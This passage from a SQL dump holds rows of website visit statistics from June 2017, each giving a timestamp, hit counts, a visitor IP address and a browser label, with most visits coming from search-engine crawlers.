134','other'),(123862,1497991883,1,1,0,0,'164.132.161.34','other'),(123863,1497991972,1,1,0,0,'51.255.65.27','other'),(123864,1497992402,1,1,0,0,'157.55.39.122','other'),(123865,1497992607,2,2,0,0,'141.8.142.152','other'),(123866,1497992662,1,1,0,0,'164.132.161.45','other'),(123867,1497992888,1,1,0,0,'141.8.132.47','other'),(123868,1497993166,2,2,0,0,'5.255.253.54','other'),(123869,1497993222,1,1,0,0,'164.132.161.42','other'),(123870,1497993296,1,0,1,0,'66.249.66.156',''),(123871,1497993554,1,1,0,0,'176.31.231.10','other'),(123872,1497993667,1,1,0,0,'207.46.13.149','other'),(123873,1497993781,1,1,0,0,'8.29.198.25','other'),(123874,1497994051,1,1,0,0,'178.154.200.42','other'),(123875,1497994118,1,1,0,0,'164.132.162.155','other'),(123876,1497994656,1,0,1,0,'68.180.231.23',''),(123877,1497994785,1,1,0,0,'141.8.132.37','other'),(123878,1497994825,2,2,0,0,'5.255.253.54','other'),(123879,1497994883,1,1,0,0,'188.187.48.248','firefox'),(123880,1497994931,1,1,0,0,'217.182.132.27','other'),(123881,1497995310,1,1,0,0,'137.74.201.99','other'),(123882,1497995479,1,1,0,0,'141.8.142.152','other'),(123883,1497995541,1,1,0,0,'141.8.132.47','other'),(123884,1497995606,1,1,0,0,'137.74.207.102','other'),(123885,1497995670,1,0,1,0,'66.249.76.107',''),(123886,1497996770,1,1,0,0,'46.48.13.161','chrome'),(123887,1497997180,1,1,0,0,'51.255.65.15','other'),(123888,1497997579,1,1,0,0,'51.255.71.114','other'),(123889,1497997678,1,1,0,0,'51.255.71.130','other'),(123890,1497998975,1,1,0,0,'51.255.65.4','other'),(123891,1497999104,1,1,0,0,'51.255.65.37','other'),(123892,1497999106,1,1,0,0,'164.132.161.4','other'),(123893,1497999608,1,1,0,0,'51.255.65.91','other'),(123894,1497999949,1,1,0,0,'51.255.65.54','other'),(123895,1498000382,1,1,0,0,'66.249.66.156','chrome'),(123896,1498000698,1,1,0,0,'66.249.76.109','chrome'),(123897,1498001206,1,1,0,0,'66.249.76.89','chrome'),(123898,1498001901,1,1,0,0,'51.255.65.46','other'),(123899,1498002214,1,1,0,0,'164.132.161.69','other'),(123900,1498002256,1,1,0,0,'164.132.161.75','other'),(123901,1498002347,1,1,0,0,'51.255.65.2','other'),(123902,1498002976,1,0,1,0,'66.249.66.155',''),(123903,1498003597,1,1,0,0,'51.255.65.7','other'),(123904,1498003933,1,1,0,0,'188.32.176.227','msie'),(123905,1498003993,1,1,0,0,'217.182.132.185','other'),(123906,1498004307,1,0,1,0,'66.249.76.108',''),(123907,1498004489,2,2,0,0,'91.209.11.236','other'),(123908,1498004615,1,1,0,0,'8.29.198.26','other'),(123909,1498004689,1,1,0,0,'164.132.161.50','other'),(123910,1498005764,1,1,0,0,'188.255.99.234','msie'),(123911,1498005810,1,1,0,0,'137.74.207.164','other'),(123912,1498005952,1,1,0,0,'164.132.161.3','other'),(123913,1498005995,1,1,0,0,'51.255.65.75','other'),(123914,1498006231,1,1,0,0,'217.182.132.19','other'),(123915,1498006344,1,1,0,0,'217.182.132.91','other'),(123916,1498006384,2,2,0,0,'91.209.11.236','other'),(123917,1498006876,1,1,0,0,'51.255.65.42','other'),(123918,1498007043,1,1,0,0,'51.255.65.31','other'),(123919,1498007050,1,1,0,0,'82.145.222.76','other'),(123920,1498008030,1,1,0,0,'217.182.132.75','other'),(123921,1498008204,1,0,1,0,'66.249.76.91',''),(123922,1498008258,1,1,0,0,'176.31.231.10','other'),(123923,1498008540,1,1,0,0,'5.255.253.54','other'),(123924,1498008619,1,1,0,0,'164.132.161.35','other'),(123925,1498008797,2,2,0,0,'178.154.200.42','other'),(123926,1498008826,1,1,0,0,'207.46.13.28','other'),(123927,1498009351,1,1,0,0,'5.255.253.73','other'),(123928,1498009379,1,1,0,0,'217.182.132.32','other'),(123929,1498009380,1,1,0,0,'216.244.66.237','other'),(123930,1498009472,1,1,0,0,'141.8.142.142','other'),(123931,1498009531,1,1,0,0,'164.132.161.29','other'),(123932,1498009567,1,1,0,0,'95.108.181.11','other'),(123933,1498009783,1,0,1,0,'66.249.76.109',''),(123934,1498009826,1,1,0,0,'164.132.162.153','other'),(123935,1498010112,2,0,2,0,'66.249.66.74',''),(123936,1498010153,1,0,1,0,'66.249.66.75',''),(123937,1498010180,2,0,2,0,'66.249.66.76',''),(123938,1498010194,4,0,4,0,'66.249.76.91',''),(123939,1498010201,1,1,0,0,'141.8.132.37','other'),(123940,1498010261,1,1,0,0,'217.182.132.171','other'),(123941,1498010262,3,0,3,0,'66.249.76.89',''),(123942,1498010272,1,1,0,0,'178.154.200.67','other'),(123943,1498010275,1,1,0,0,'5.255.253.16','other'),(123944,1498010356,1,1,0,0,'91.209.11.236','other'),(123945,1498010361,1,1,0,0,'51.255.65.60','other'),(123946,1498010372,4,0,4,0,'66.249.76.93',''),(123947,1498010512,1,1,0,0,'141.8.142.50','other'),(123948,1498010631,1,1,0,0,'217.182.132.73','other'),(123949,1498010662,1,1,0,0,'141.8.142.70','other'),(123950,1498010704,1,1,0,0,'178.154.200.42','other'),(123951,1498010805,1,1,0,0,'164.132.161.22','other'),(123952,1498010946,2,2,0,0,'5.255.253.33','other'),(123953,1498010955,1,1,0,0,'178.154.189.10','other'),(123954,1498011203,1,1,0,0,'95.108.181.11','other'),(123955,1498011252,2,0,2,0,'66.249.66.75',''),(123956,1498011278,1,0,1,0,'66.249.66.74',''),(123957,1498011287,1,1,0,0,'162.210.196.100','other'),(123958,1498011662,1,1,0,0,'141.8.142.134','other'),(123959,1498011772,1,1,0,0,'66.249.66.156','chrome'),(123960,1498011784,1,1,0,0,'141.8.142.39','other'),(123961,1498011811,1,1,0,0,'141.8.132.47','other'),(123962,1498012029,1,1,0,0,'178.154.200.42','other'),(123963,1498012202,1,1,0,0,'51.255.65.58','other'),(123964,1498012342,2,2,0,0,'5.255.253.66','other'),(123965,1498012343,1,1,0,0,'93.158.152.43','other'),(123966,1498012419,1,1,0,0,'141.8.142.152','other'),(123967,1498012506,1,1,0,0,'188.187.34.170','chrome'),(123968,1498012978,1,1,0,0,'5.255.253.27','other'),(123969,1498013233,1,1,0,0,'141.8.142.51','other'),(123970,1498013409,1,1,0,0,'178.154.200.12','other'),(123971,1498013456,1,1,0,0,'66.249.76.91','chrome'),(123972,1498013620,4,4,0,0,'5.255.253.54','other'),(123973,1498013639,1,1,0,0,'95.108.181.11','other'),(123974,1498013650,1,1,0,0,'87.250.224.21','other'),(123975,1498013807,2,2,0,0,'178.154.200.42','other'),(123976,1498014103,1,1,0,0,'141.8.142.152','other'),(123977,1498014184,1,1,0,0,'217.182.132.94','other'),(123978,1498014249,2,2,0,0,'141.8.132.47','other'),(123979,1498014582,1,1,0,0,'141.8.142.134','other'),(123980,1498014754,1,1,0,0,'51.255.71.98','other'),(123981,1498014938,3,3,0,0,'5.255.253.54','other'),(123982,1498015092,1,1,0,0,'141.8.142.152','other'),(123983,1498015134,1,0,1,0,'66.249.76.107',''),(123984,1498015151,2,2,0,0,'141.8.132.47','other'),(123985,1498015397,1,1,0,0,'178.154.200.42','other'),(123986,1498015462,1,1,0,0,'8.29.198.26','other'),(123987,1498015466,1,1,0,0,'164.132.161.68','other'),(123988,1498016106,2,2,0,0,'5.255.253.54','other'),(123989,1498016186,1,1,0,0,'164.132.161.79','other'),(123990,1498016216,1,1,0,0,'51.255.65.24','other'),(123991,1498016422,1,1,0,0,'51.255.65.86','other'),(123992,1498016709,4,4,0,0,'178.154.200.42','other'),(123993,1498016717,2,2,0,0,'141.8.142.134','other'),(123994,1498016764,1,1,0,0,'157.55.39.220','other'),(123995,1498016800,1,1,0,0,'141.8.132.47','other'),(123996,1498016908,1,1,0,0,'164.132.161.61','other'),(123997,1498016987,2,2,0,0,'37.9.113.11','other'),(123998,1498017098,1,1,0,0,'66.249.76.108','chrome'),(123999,1498017266,1,1,0,0,'5.255.253.66','other'),(124000,1498017458,1,1,0,0,'217.182.132.78','other'),(124001,1498017794,1,1,0,0,'141.8.142.134','other'),(124002,1498017842,3,3,0,0,'178.154.200.42','other'),(124003,1498017929,1,0,1,0,'66.249.76.109',''),(124004,1498017938,1,1,0,0,'141.8.132.37','other'),(124005,1498017975,1,1,0,0,'141.8.142.152','other'),(124006,1498018058,1,1,0,0,'141.8.132.47','other'),(124007,1498018085,1,1,0,0,'164.132.161.20','other'),(124008,1498018172,1,1,0,0,'5.255.253.54','other'),(124009,1498018257,1,1,0,0,'217.182.132.87','other'),(124010,1498018487,1,1,0,0,'217.182.132.34','other'),(124011,1498018539,1,1,0,0,'217.182.132.60','other'),(124012,1498018841,1,1,0,0,'217.182.132.62','other'),(124013,1498018928,1,1,0,0,'180.76.15.26','other'),(124014,1498019456,2,2,0,0,'178.154.200.42','other'),(124015,1498019488,1,1,0,0,'193.194.127.217','firefox'),(124016,1498019551,1,1,0,0,'141.8.142.152','other'),(124017,1498019727,1,1,0,0,'164.132.161.27','other'),(124018,1498019776,1,1,0,0,'51.255.65.24','other'),(124019,1498020010,1,1,0,0,'217.182.132.186','other'),(124020,1498020555,1,0,1,0,'66.249.66.157',''),(124021,1498020673,1,1,0,0,'137.74.207.159','other'),(124022,1498020683,2,2,0,0,'5.255.253.54','other'),(124023,1498020685,2,2,0,0,'178.154.200.42','other'),(124024,1498020870,14,14,0,0,'144.76.38.40','other'),(124025,1498020965,1,1,0,0,'66.249.76.91','chrome'),(124026,1498020995,1,1,0,0,'217.182.132.55','other'),(124027,1498021121,1,1,0,0,'66.249.76.95','chrome'),(124028,1498021661,1,1,0,0,'164.132.161.35','other'),(124029,1498021789,1,1,0,0,'95.132.177.187','chrome'),(124030,1498021809,1,1,0,0,'164.132.161.8','other'),(124031,1498023213,1,1,0,0,'94.179.21.218','chrome'),(124032,1498023838,1,1,0,0,'164.132.161.75','other'),(124033,1498023945,1,0,1,0,'66.249.76.95',''),(124034,1498024337,1,1,0,0,'141.8.142.134','other'),(124035,1498024464,1,1,0,0,'91.196.178.67','firefox'),(124036,1498025857,1,1,0,0,'164.132.161.76','other'),(124037,1498025914,1,1,0,0,'157.55.39.222','other'),(124038,1498025985,1,1,0,0,'217.182.132.15','other'),(124039,1498026298,1,1,0,0,'8.29.198.27','other'),(124040,1498027120,1,1,0,0,'164.132.161.53','other'),(124041,1498027446,1,0,1,0,'66.249.66.76',''),(124042,1498027469,1,0,1,0,'66.249.66.75',''),(124043,1498027523,1,1,0,0,'66.249.66.76','chrome'),(124044,1498027634,1,1,0,0,'164.132.161.16','other'),(124045,1498027888,1,0,1,0,'66.249.76.95',''),(124046,1498027925,1,1,0,0,'195.10.210.49','chrome'),(124047,1498028063,4,4,0,0,'5.189.160.96','other'),(124048,1498028088,1,0,1,0,'66.249.76.91',''),(124049,1498028661,1,1,0,0,'51.255.65.80','other'),(124050,1498028762,28,28,0,0,'46.4.32.75','other'),(124051,1498028838,1,1,0,0,'195.10.210.49','chrome'),(124052,1498029049,1,1,0,0,'217.182.132.175','other'),(124053,1498029070,1,1,0,0,'217.182.132.97','other'),(124054,1498029279,1,1,0,0,'66.249.76.95','chrome'),(124055,1498029496,1,1,0,0,'94.178.106.197','chrome'),(124056,1498029769,1,1,0,0,'66.249.76.109','chrome'),(124057,1498029973,1,1,0,0,'164.132.162.164','other'),(124058,1498030132,1,1,0,0,'217.182.132.156','other'),(124059,1498030225,1,1,0,0,'66.249.66.74','chrome'),(124060,1498030453,1,0,1,0,'66.249.76.95',''),(124061,1498030579,1,1,0,0,'51.255.71.100','other'),(124062,1498030778,1,1,0,0,'207.46.13.28','other'),(124063,1498030841,1,1,0,0,'51.255.65.54','other'),(124064,1498031171,1,0,1,0,'66.249.76.108',''),(124065,1498031233,1,1,0,0,'164.132.161.77','other'),(124066,1498031392,1,1,0,0,'141.8.132.4','other'),(124067,1498031587,2,2,0,0,'217.182.132.91','other'),(124068,1498031673,1,0,1,0,'66.249.76.95',''),(124069,1498031875,1,1,0,0,'217.182.132.187','other'),(124070,1498032038,1,0,1,0,'66.249.76.91',''),(124071,1498032126,1,1,0,0,'217.182.132.32','other'),(124072,1498032136,1,1,0,0,'217.182.132.188','other'),(124073,1498032197,2,2,0,0,'66.249.66.74','chrome'),(124074,1498033044,1,1,0,0,'164.132.161.4','other'),(124075,1498033133,1,1,0,0,'51.255.65.79','other'),(124076,1498033211,2,2,0,0,'178.95.246.179','chrome'),(124077,1498033384,1,1,0,0,'51.255.71.100','other'),(124078,1498033525,1,1,0,0,'51.255.65.71','other'),(124079,1498033629,1,1,0,0,'94.179.10.128','other'),(124080,1498034189,1,1,0,0,'51.255.71.110','other'),(124081,1498034317,1,1,0,0,'164.132.161.30','other'),(124082,1498034569,1,0,1,0,'68.180.230.48',''),(124083,1498034910,1,1,0,0,'141.8.142.134','other'),(124084,1498035104,1,1,0,0,'91.196.178.68','chrome'),(124085,1498035274,1,0,1,0,'66.249.76.108',''),(124086,1498035650,1,1,0,0,'51.255.71.121','other'),(124087,1498036297,1,1,0,0,'164.132.161.8','other'),(124088,1498036474,1,0,1,0,'66.249.76.107',''),(124089,1498036522,1,1,0,0,'207.46.13.28','other'),(124090,1498036668,1,1,0,0,'164.132.161.48','other'),(124091,1498036823,3,3,0,0,'91.209.11.236','other'),(124092,1498037050,1,1,0,0,'217.182.132.70','other'),(124093,1498037125,1,1,0,0,'157.55.39.222','other'),(124094,1498037129,1,1,0,0,'8.29.198.27','other'),(124095,1498037356,1,1,0,0,'164.132.161.52','other'),(124096,1498038062,1,1,0,0,'217.182.132.58','other'),(124097,1498038090,1,1,0,0,'92.113.127.75','chrome'),(124098,1498038265,2,2,0,0,'91.209.11.236','other'),(124099,1498038329,1,1,0,0,'66.249.76.91','chrome'),(124100,1498039471,1,1,0,0,'137.74.207.109','other'),(124101,1498039767,1,1,0,0,'207.154.243.51','other'),(124102,1498039858,1,1,0,0,'217.182.132.185','other'),(124103,1498039901,1,1,0,0,'92.112.109.230','chrome'),(124104,1498040143,1,0,1,0,'66.249.66.74',''),(124105,1498040209,1,1,0,0,'91.209.11.236','other'),(124106,1498040280,1,1,0,0,'66.249.76.109','chrome'),(124107,1498040282,1,1,0,0,'164.132.161.8','other'),(124108,1498040482,1,1,0,0,'46.161.9.55','chrome'),(124109,1498040637,1,1,0,0,'164.132.161.63','other'),(124110,1498040811,1,1,0,0,'176.15.42.236','chrome'),(124111,1498040812,1,1,0,0,'188.255.99.234','firefox'),(124112,1498040864,1,1,0,0,'54.208.102.37','other'),(124113,1498041190,1,1,0,0,'207.46.13.28','other'),(124114,1498041196,1,0,1,0,'66.249.66.156',''),(124115,1498041272,1,1,0,0,'212.1.72.74','firefox'),(124116,1498042245,1,1,0,0,'5.255.253.16','other'),(124117,1498042251,1,1,0,0,'141.8.142.39','other'),(124118,1498042272,1,1,0,0,'37.9.113.11','other'),(124119,1498042768,1,1,0,0,'217.182.132.4','other'),(124120,1498042831,1,1,0,0,'51.255.65.21','other'),(124121,1498043287,1,1,0,0,'51.255.65.30','other'),(124122,1498043649,1,1,0,0,'62.80.175.42','firefox'),(124123,1498043904,1,1,0,0,'164.132.162.153','other'),(124124,1498043941,1,1,0,0,'164.132.161.4','other'),(124125,1498044279,1,1,0,0,'217.182.132.80','other'),(124126,1498044788,1,1,0,0,'157.55.39.222','other'),(124127,1498044795,1,1,0,0,'51.255.65.2','other'),(124128,1498044880,1,1,0,0,'40.77.167.141','other'),(124129,1498044883,1,1,0,0,'51.255.65.95','other'),(124130,1498044990,1,1,0,0,'164.132.161.54','other'),(124131,1498045009,1,1,0,0,'164.132.161.10','other'),(124132,1498045087,1,0,1,0,'68.180.230.48',''),(124133,1498045103,1,1,0,0,'164.132.162.158','other'),(124134,1498045109,1,1,0,0,'95.132.92.72','chrome'),(124135,1498045294,1,0,1,0,'66.249.76.137',''),(124136,1498045351,1,1,0,0,'66.249.76.112','chrome'),(124137,1498045447,3,3,0,0,'91.196.178.167','chrome'),(124138,1498046099,1,1,0,0,'164.132.161.33','other'),(124139,1498046214,1,1,0,0,'87.250.224.26','other'),(124140,1498047327,1,1,0,0,'51.255.65.46','other'),(124141,1498047425,1,0,1,0,'66.249.76.112',''),(124142,1498047452,1,1,0,0,'91.196.178.67','firefox'),(124143,1498047493,1,1,0,0,'66.249.76.113','chrome'),(124144,1498047546,1,1,0,0,'51.255.65.47','other'),(124145,1498047703,1,1,0,0,'66.249.76.114','chrome'),(124146,1498047831,1,1,0,0,'66.249.66.76','chrome'),(124147,1498047854,1,0,1,0,'66.249.76.131',''),(124148,1498047893,2,2,0,0,'95.132.142.136','chrome'),(124149,1498047965,1,1,0,0,'8.29.198.25','other'),(124150,1498048091,1,1,0,0,'91.196.178.70','chrome'),(124151,1498048158,1,1,0,0,'51.255.65.84','other'),(124152,1498048250,1,1,0,0,'66.249.66.155','chrome'),(124153,1498048409,6,6,0,0,'64.120.56.210','other'),(124154,1498048430,1,1,0,0,'92.113.7.162','chrome'),(124155,1498048460,1,1,0,0,'5.255.253.16','other'),(124156,1498048706,1,1,0,0,'5.164.195.20','msie'),(124157,1498049153,1,1,0,0,'217.182.132.15','other'),(124158,1498049167,1,1,0,0,'91.196.178.68','chrome'),(124159,1498049186,1,1,0,0,'217.182.132.69','other'),(124160,1498049509,1,1,0,0,'66.249.76.112','chrome'),(124161,1498049526,1,1,0,0,'91.196.178.164','chrome'),(124162,1498049979,1,1,0,0,'91.196.178.65','firefox'),(124163,1498050169,1,1,0,0,'164.132.161.42','other'),(124164,1498050600,1,1,0,0,'217.182.132.58','other'),(124165,1498050670,1,1,0,0,'66.249.66.155','chrome'),(124166,1498050882,1,1,0,0,'51.255.71.113','other'),(124167,1498051161,1,1,0,0,'217.182.132.71','other'),(124168,1498051394,1,1,0,0,'93.158.152.43','other'),(124169,1498051401,6,6,0,0,'204.12.208.10','other'),(124170,1498051996,1,1,0,0,'51.255.71.123','other'),(124171,1498052302,1,1,0,0,'213.130.15.150','chrome'),(124172,1498052484,1,1,0,0,'91.233.48.195','chrome'),(124173,1498052631,1,1,0,0,'164.132.161.60','other'),(124174,1498053051,1,1,0,0,'51.255.71.130','other'),(124175,1498053079,1,1,0,0,'141.8.132.19','other'),(124176,1498053157,1,1,0,0,'164.132.161.7','other'),(124177,1498053249,1,1,0,0,'93.158.152.14','other'),(124178,1498053426,1,1,0,0,'51.255.65.54','other'),(124179,1498053445,2,2,0,0,'5.255.253.66','other'),(124180,1498053544,2,2,0,0,'95.108.179.14','other'),(124181,1498053547,1,1,0,0,'217.182.132.71','other'),(124182,1498053656,1,1,0,0,'93.158.152.43','other'),(124183,1498053660,1,1,0,0,'87.250.224.21','other'),(124184,1498053885,1,1,0,0,'37.9.113.11','other'),(124185,1498053900,1,1,0,0,'178.154.149.7','other'),(124186,1498053920,1,1,0,0,'217.182.132.82','other'),(124187,1498053964,1,1,0,0,'87.250.224.19','other'),(124188,1498053976,1,0,1,0,'66.249.66.157',''),(124189,1498054053,1,1,0,0,'178.154.200.67','other'),(124190,1498054125,1,1,0,0,'51.255.71.116','other'),(124191,1498054293,1,0,1,0,'66.249.76.112',''),(124192,1498054295,2,2,0,0,'178.154.200.42','other'),(124193,1498054390,2,2,0,0,'141.8.142.152','other'),(124194,1498054441,1,1,0,0,'141.8.142.134','other'),(124195,1498054561,1,1,0,0,'91.196.178.69','firefox'),(124196,1498054661,3,3,0,0,'216.244.66.237','other'),(124197,1498054687,1,1,0,0,'66.249.76.114','chrome'),(124198,1498055185,1,1,0,0,'51.255.65.29','other'),(124199,1498055463,1,1,0,0,'5.255.253.54','other'),(124200,1498055515,1,1,0,0,'141.8.142.152','other'),(124201,1498055555,1,1,0,0,'217.182.132.78','other'),(124202,1498055694,1,1,0,0,'217.182.132.187','other'),(124203,1498055976,1,1,0,0,'185.76.10.88','chrome'),(124204,1498056819,1,1,0,0,'51.255.65.74','other'),(124205,1498056940,1,1,0,0,'46.211.119.119','chrome'),(124206,1498057797,1,0,1,0,'66.249.66.76',''),(124207,1498057835,1,1,0,0,'217.182.132.173','other'),(124208,1498057903,12,12,0,0,'5.189.175.64','other'),(124209,1498057955,2,2,0,0,'216.244.66.237','other'),(124210,1498058000,1,1,0,0,'217.182.132.74','other'),(124211,1498058015,1,1,0,0,'66.249.76.131','chrome'),(124212,1498058270,1,1,0,0,'51.255.71.120','other'),(124213,1498058800,1,1,0,0,'8.29.198.25','other'),(124214,1498058847,1,1,0,0,'164.132.161.70','other'),(124215,1498059214,1,1,0,0,'217.182.132.35','other'),(124216,1498059339,2,2,0,0,'91.209.11.236','other'),(124217,1498059461,1,0,1,0,'66.249.66.155',''),(124218,1498059490,115,2,113,0,'198.204.253.58',''),(124219,1498059538,1,0,1,0,'66.249.66.157',''),(124220,1498059844,1,1,0,0,'217.182.132.16','other'),(124221,1498059925,1,1,0,0,'164.132.161.9','other'),(124222,1498060033,1,1,0,0,'217.182.132.83','other'),(124223,1498060401,31,0,31,0,'198.204.253.58',''),(124224,1498060430,1,1,0,0,'217.182.132.74','other'),(124225,1498060608,71,71,0,0,'198.204.253.58','msie'),(124226,1498060813,1,1,0,0,'217.182.132.27','other'),(124227,1498060821,1,1,0,0,'51.255.65.95','other'),(124228,1498060893,5,5,0,0,'198.204.253.58','firefox'),(124229,1498061152,1,1,0,0,'46.101.0.98','chrome'),(124230,1498062067,1,1,0,0,'164.132.161.80','other'),(124231,1498062172,1,1,0,0,'164.132.161.32','other'),(124232,1498062414,1,1,0,0,'164.132.161.92','other'),(124233,1498062954,1,1,0,0,'178.154.200.42','other'),(124234,1498062982,1,1,0,0,'51.255.65.70','other'),(124235,1498063101,1,1,0,0,'217.182.132.29','other'),(124236,1498063454,1,1,0,0,'5.255.253.54','other'),(124237,1498063469,1,1,0,0,'66.249.76.131','chrome'),(124238,1498063803,1,1,0,0,'217.182.132.77','other'),(124239,1498063848,1,1,0,0,'217.182.132.78','other'),(124240,1498063876,1,1,0,0,'91.196.178.34','chrome'),(124241,1498064455,1,1,0,0,'137.74.207.108','other'),(124242,1498064599,1,1,0,0,'217.182.132.72','other'),(124243,1498065001,1,1,0,0,'51.255.65.224','other'),(124244,1498065812,1,1,0,0,'217.182.132.23','other'),(124245,1498065864,1,1,0,0,'217.182.132.4','other'),(124246,1498066040,1,0,1,0,'66.249.76.147',''),(124247,1498066268,1,1,0,0,'46.48.13.161','chrome'),(124248,1498066356,1,1,0,0,'92.113.174.209','chrome'),(124249,1498067036,1,0,1,0,'66.249.76.113',''),(124250,1498067285,1,1,0,0,'178.140.87.39','msie'),(124251,1498068712,1,1,0,0,'217.182.132.61','other'),(124252,1498068844,1,1,0,0,'82.145.221.184','other'),(124253,1498068943,1,1,0,0,'164.132.161.23','other'),(124254,1498069076,1,1,0,0,'217.182.132.60','other'),(124255,1498069635,1,1,0,0,'8.29.198.26','other'),(124256,1498069668,1,1,0,0,'217.182.132.85','other'),(124257,1498069892,1,1,0,0,'51.255.65.88','other'),(124258,1498069960,1,0,1,0,'66.249.76.113',''),(124259,1498070211,1,0,1,0,'66.249.76.114',''),(124260,1498070252,1,1,0,0,'51.255.65.44','other'),(124261,1498070255,1,0,1,0,'66.249.76.131',''),(124262,1498071133,1,1,0,0,'141.8.132.4','other'),(124263,1498071341,1,1,0,0,'217.182.132.18','other'),(124264,1498071361,1,0,1,0,'66.249.76.131',''),(124265,1498071373,1,1,0,0,'164.132.161.50','other'),(124266,1498071675,1,1,0,0,'217.182.132.240','other'),(124267,1498072029,1,0,1,0,'66.249.66.155',''),(124268,1498072123,1,1,0,0,'217.182.132.6','other'),(124269,1498072223,1,1,0,0,'95.135.90.15','other'),(124270,1498072378,1,1,0,0,'51.255.65.50','other'),(124271,1498072948,1,0,1,0,'66.249.66.157',''),(124272,1498073215,1,1,0,0,'164.132.161.30','other'),(124273,1498073882,1,1,0,0,'164.132.162.159','other'),(124274,1498074355,1,1,0,0,'178.95.156.151','chrome'),(124275,1498074373,1,1,0,0,'212.113.42.16','chrome'),(124276,1498074613,1,1,0,0,'217.182.132.68','other'),(124277,1498074729,1,1,0,0,'217.182.132.14','other'),(124278,1498074894,1,1,0,0,'164.132.162.160','other'),(124279,1498074942,1,1,0,0,'217.182.132.54','other'),(124280,1498075364,1,0,1,0,'66.249.76.131',''),(124281,1498075591,1,1,0,0,'51.255.65.46','other'),(124282,1498075969,1,1,0,0,'51.255.65.37','other'),(124283,1498076164,1,1,0,0,'51.255.65.44','other'),(124284,1498076230,1,1,0,0,'217.182.132.174','other'),(124285,1498077087,1,1,0,0,'178.154.200.42','other'),(124286,1498077315,1,1,0,0,'51.255.65.11','other'),(124287,1498077542,1,1,0,0,'164.132.161.92','other'),(124288,1498077757,1,1,0,0,'217.182.132.172','other'),(124289,1498078086,1,1,0,0,'176.195.177.216','msie'),(124290,1498078087,1,1,0,0,'217.182.132.70','other'),(124291,1498078105,1,0,1,0,'66.249.76.112',''),(124292,1498078644,1,1,0,0,'217.182.132.24','other'),(124293,1498078836,1,1,0,0,'5.255.253.16','other'),(124294,1498078839,1,1,0,0,'95.108.213.25','other'),(124295,1498078856,1,1,0,0,'141.8.142.129','other'),(124296,1498078934,1,1,0,0,'5.255.253.45','other'),(124297,1498079105,1,1,0,0,'51.255.71.98','other'),(124298,1498079177,5,5,0,0,'5.255.253.54','other'),(124299,1498079183,1,1,0,0,'217.182.132.157','other'),(124300,1498079256,1,1,0,0,'51.255.65.60','other'),(124301,1498079353,1,1,0,0,'164.132.161.54','other'),(124302,1498079404,3,3,0,0,'178.154.200.42','other'),(124303,1498079565,1,1,0,0,'141.8.132.47','other'),(124304,1498079637,3,3,0,0,'37.9.113.11','other'),(124305,1498080040,2,2,0,0,'141.8.142.152','other'),(124306,1498080182,2,2,0,0,'5.255.253.54','other'),(124307,1498080327,1,1,0,0,'51.255.71.101','other'),(124308,1498080471,1,1,0,0,'8.29.198.25','other'),(124309,1498080722,1,1,0,0,'164.132.161.66','other'),(124310,1498080839,1,1,0,0,'5.248.133.160','chrome'),(124311,1498080964,1,1,0,0,'141.8.142.152','other'),(124312,1498081905,1,1,0,0,'164.132.161.28','other'),(124313,1498082119,1,1,0,0,'51.255.65.22','other'),(124314,1498082190,1,1,0,0,'207.154.247.199','chrome'),(124315,1498082284,1,1,0,0,'95.132.10.253','chrome'),(124316,1498082355,1,1,0,0,'66.249.76.131','chrome'),(124317,1498082779,1,1,0,0,'164.132.162.155','other'),(124318,1498082897,1,1,0,0,'217.182.132.37','other'),(124319,1498083025,3,3,0,0,'141.8.132.47','other'),(124320,1498083182,1,1,0,0,'51.255.65.25','other'),(124321,1498083436,3,3,0,0,'141.8.142.152','other'),(124322,1498083605,1,1,0,0,'178.154.200.42','other'),(124323,1498083650,1,1,0,0,'217.182.132.91','other'),(124324,1498084151,1,1,0,0,'217.182.132.80','other'),(124325,1498084877,1,1,0,0,'216.244.66.237','other'),(124326,1498085014,1,1,0,0,'164.132.161.77','other'),(124327,1498085029,1,1,0,0,'46.48.13.161','chrome'),(124328,1498085264,1,1,0,0,'164.132.161.37','other'),(124329,1498085266,1,1,0,0,'51.255.65.21','other'),(124330,1498085406,1,1,0,0,'217.182.132.20','other'),(124331,1498086051,1,0,1,0,'66.249.76.113',''),(124332,1498086552,1,1,0,0,'217.182.132.149','other'),(124333,1498087066,1,1,0,0,'54.165.59.7','other'),(124334,1498087590,1,1,0,0,'66.102.9.153','chrome'),(124335,1498087637,1,1,0,0,'107.178.195.221','chrome'),(124336,1498087638,1,1,0,0,'107.178.195.222','chrome'),(124337,1498087647,1,1,0,0,'195.162.89.78','chrome'),(124338,1498088023,2,2,0,0,'217.182.132.78','other'),(124339,1498088637,1,1,0,0,'66.249.66.157','chrome'),(124340,1498088739,1,1,0,0,'137.74.207.110','other'),(124341,1498089332,1,1,0,0,'207.46.13.28','other'),(124342,1498089491,1,0,1,0,'66.249.76.114',''),(124343,1498089669,1,1,0,0,'164.132.161.79','other'),(124344,1498089680,1,1,0,0,'164.132.161.21','other'),(124345,1498089743,1,1,0,0,'66.249.76.114','chrome'),(124346,1498090112,1,1,0,0,'109.173.57.250','msie'),(124347,1498090124,1,0,1,0,'66.249.76.137',''),(124348,1498090206,1,1,0,0,'164.132.161.46','other'),(124349,1498090992,1,1,0,0,'217.182.132.34','other'),(124350,1498091054,27,27,0,0,'208.43.225.85','other'),(124351,1498091302,1,1,0,0,'8.29.198.25','other'),(124352,1498091681,1,1,0,0,'217.182.132.180','other'),(124353,1498092062,1,1,0,0,'217.182.132.97','other'),(124354,1498092100,1,1,0,0,'164.132.162.187','other'),(124355,1498092637,3,3,0,0,'54.165.59.7','other'),(124356,1498093093,1,1,0,0,'217.182.132.16','other'),(124357,1498093736,1,0,1,0,'68.180.230.48',''),(124358,1498093965,1,1,0,0,'51.255.71.125','other'),(124359,1498094350,1,1,0,0,'217.182.132.183','other'),(124360,1498095031,1,1,0,0,'217.182.132.17','other'),(124361,1498095074,1,1,0,0,'217.182.132.76','other'),(124362,1498095236,1,1,0,0,'66.249.66.155','chrome'),(124363,1498095655,1,1,0,0,'66.249.76.137','chrome'),(124364,1498095718,1,1,0,0,'51.255.65.65','other'),(124365,1498096098,1,1,0,0,'217.182.132.70','other'),(124366,1498096748,1,1,0,0,'164.132.161.18','other'),(124367,1498097357,1,1,0,0,'164.132.162.188','other'),(124368,1498097376,1,1,0,0,'217.182.132.32','other'),(124369,1498097468,1,1,0,0,'216.244.66.237','other'),(124370,1498097532,8,8,0,0,'163.172.74.105','other'),(124371,1498097755,1,1,0,0,'207.46.13.28','other'),(124372,1498098151,1,1,0,0,'51.255.71.111','other'),(124373,1498099451,1,1,0,0,'217.182.132.62','other'),(124374,1498100122,1,1,0,0,'164.132.161.32','other'),(124375,1498100658,1,1